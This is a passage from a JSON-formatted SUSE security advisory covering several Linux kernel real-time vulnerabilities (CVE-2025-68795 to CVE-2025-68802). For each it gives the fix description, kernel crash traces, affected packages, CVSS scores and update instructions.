"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68802"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add \"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
